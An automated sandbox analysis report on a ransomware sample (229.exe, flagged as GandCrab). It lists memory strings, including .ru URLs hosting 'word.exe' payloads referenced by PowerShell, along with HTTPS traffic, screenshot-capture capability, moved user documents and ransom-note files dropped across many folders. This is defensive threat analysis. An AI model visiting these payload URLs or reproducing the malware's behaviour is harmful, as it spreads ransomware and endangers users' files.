Source: 229.exe, 00000005.00000003.1810697326.06F90000.00000004.sdmpString found in binary or memory: https://hg.m9
Source: 229.exe, 00000005.00000003.1810878134.06F90000.00000004.sdmpString found in binary or memory: https://hg.mv
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://jewemsk.ru
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exeH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://jewemsk.ruH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://jewemsk.ruh%
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&amp;url=%s
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/events/actions/current/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/domain/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/domain/#lease
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/domain/#registration
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/domain/price/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/domain/rules/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/ecp/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hardware/rent/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hardware/rent/#colocation
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hardware/rent/#smart-server
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/#professional
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/#unix
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/#windows
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/constructor/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/unix/edu/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/vps/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/vps/#hyperConstructor
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/hosting/vps/#vpsPlusMssql
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/mail/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/mail/#mail_transfer
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/mail/#mail_with_hosting
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/soft/ispmanager/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/special_packs/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/ssl/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/ssl/#dv
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/ssl/#ev
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmpString found in binary or memory: https://masterhost.ru/service/ssl/#ov
Source: 229.exe, 00000005.00000003.1807771526.06F90000.00000004.sdmpString found in binary or memory: https://real.com/
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmpString found in binary or memory: https://sourceforge.net/project/?group_id=1519
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://starstyl.ru
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: https://starstyl.ru/assets/plugiH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmpString found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpString found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exeH
Source: powershell.exe, 00000004.00000002.1673288269.0234A000.00000004.sdmpString found in binary or memory: https://starstyl.ruDj
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmpString found in binary or memory: https://www.geotrust.com/resources/repository0
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.com
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.com/chrome/browser/desktop/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.com/chrome/browser/thankyou.html?platform=win
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.com/images/icons/product/chrome-32.png
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.com/intl/en/chrome/browser/privacy/eula_text.html
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.google.com/search?q=.net
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.google.com/search?q=chrome
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.google.com/search?q=test&ie=utf-8&oe=utf-8
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmpString found in binary or memory: https://www.google.de/images/branding/product/ico/googleg_lodp.ico
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.google.de/search?q=.net
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.de/search?q=chrome
Source: 229.exe, 00000005.00000003.1820920259.06F90000.00000004.sdmpString found in binary or memory: https://www.google.de/search?q=test&ie=utf-8&oe=utf-8&gws_rd=cr&ei=9yRZWNXLEMfYjwTOhpXYDg
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmpString found in binary or memory: https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjwzYrg7ILRAhUG0IMKHVAfDIwQ
Source: 229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmpString found in binary or memory: https://www.kakaocorp.link/static/imgs/hehe.png
Source: 229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmpString found in binary or memory: https://www.kakaocorp.link/static/imgs/hehe.png6
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmpString found in binary or memory: https://www.mibbit.com/?url=%s
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.mozilla.org/en-US/about/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.mozilla.org/en-US/contribute/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.mozilla.org/en-US/firefox/central/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.mozilla.org/en-US/firefox/customize/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmpString found in binary or memory: https://www.mozilla.org/en-US/firefox/help/
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: https://www.thawte.com/cps0/
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmpString found in binary or memory: https://www.thawte.com/repository0W
Source: 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmpString found in binary or memory: https://www.torproject.org/
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshotsShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_1_004112E0 PathCommonPrefixA,GetFileInformationByHandle,GetFileInformationByHandle,PathCompactPathA,new,OpenFileMappingA,MapViewOfFile,GetDC,SelectObject,CreateCompatibleDC,CreateFontA,SelectObject,SelectObject,SelectObject,CreateDIBSection,SelectObject,SetBkMode,SetTextColor,TextOutA,SelectObject,SendMessageA,SelectObject,SelectObject,GetOpenFileNameA,DeleteObject,DeleteObject,SelectObject,DeleteObject,DeleteObject,GetWindowDC,GetWindowRect,PdhOpenQueryA,OleTranslateColor,new,__libm_sse2_cos_precise,__libm_sse2_cos_precise,VirtualAlloc,Shell_NotifyIconA,5_1_004112E0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Modifies existing user documents (likely ransomware behavior)Show sources
Source: C:\Windows\Temp\229.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.xlsxJump to behavior
Source: C:\Windows\Temp\229.exeFile moved: C:\Users\user\Desktop\Sarah_Siedler_Bewerbungsunterlagen.docJump to behavior
Source: C:\Windows\Temp\229.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docxJump to behavior
Source: C:\Windows\Temp\229.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN.xlsxJump to behavior
Source: C:\Windows\Temp\229.exeFile moved: C:\Users\user\Desktop\NEBFQQYWPS.xlsxJump to behavior

System Summary:

barindex
Detected GrandCrab Ransomware (readme file)Show sources
Source: C:\Windows\Temp\229.exeFile created: C:\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\$Recycle.Bin\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1005\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\MSOCache\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\PerfLogs\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\PerfLogs\Admin\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Program Files\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Recovery\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Local\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Local\Microsoft\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Local\Temp\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Desktop\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Documents\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Music\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Pictures\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Videos\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Downloads\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Favorites\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Links\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Saved Games\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\bin\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\bin\client\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\applet\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\cmm\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\deploy\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\ext\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\fonts\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\i386\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\images\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\jfr\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\management\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\security\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Collab\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Forms\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\P4MTYZFY\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Headlights\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Linguistics\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Identities\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Credentials\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Forms\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\MMC\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Proof\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Speech\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\1033\PSVULHG-MANUAL.txtJump to dropped file
